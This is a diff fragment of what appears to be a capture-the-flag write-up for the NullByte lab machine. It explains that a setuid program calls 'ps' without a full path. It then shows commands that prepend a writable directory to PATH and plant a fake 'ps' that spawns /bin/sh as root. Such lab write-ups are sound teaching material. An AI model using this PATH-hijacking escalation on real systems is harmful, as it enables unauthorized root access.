740i/Writeups/nullbyte/nullbyte.md

  804843c:       66 90                   xchg   %ax,%ax
  804843e:       66 90                   xchg   %ax,%ax
 ```
 Looking through that for awhile, it seems to be loading the hex 0x73 and 0x70 characters into EAX followed by a null, then calling a system function.
 Seeing as how that translates to "ps", we take a wild guess and assume that this setuid procwatch executable is calling "ps" without specifying a path.
 If we can just set the PATH variable to a folder we can write into, then anything named "ps" in there will run instead of the original "ps" at /bin/ps.
-In this case it will just run /bin/sh as root and game over.
+In our case it will just run /bin/sh as root and game over.
 ```
 ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:${PATH}
 ramses@NullByte:/var/www/backup$ echo '/bin/sh' > ps && chmod +x ps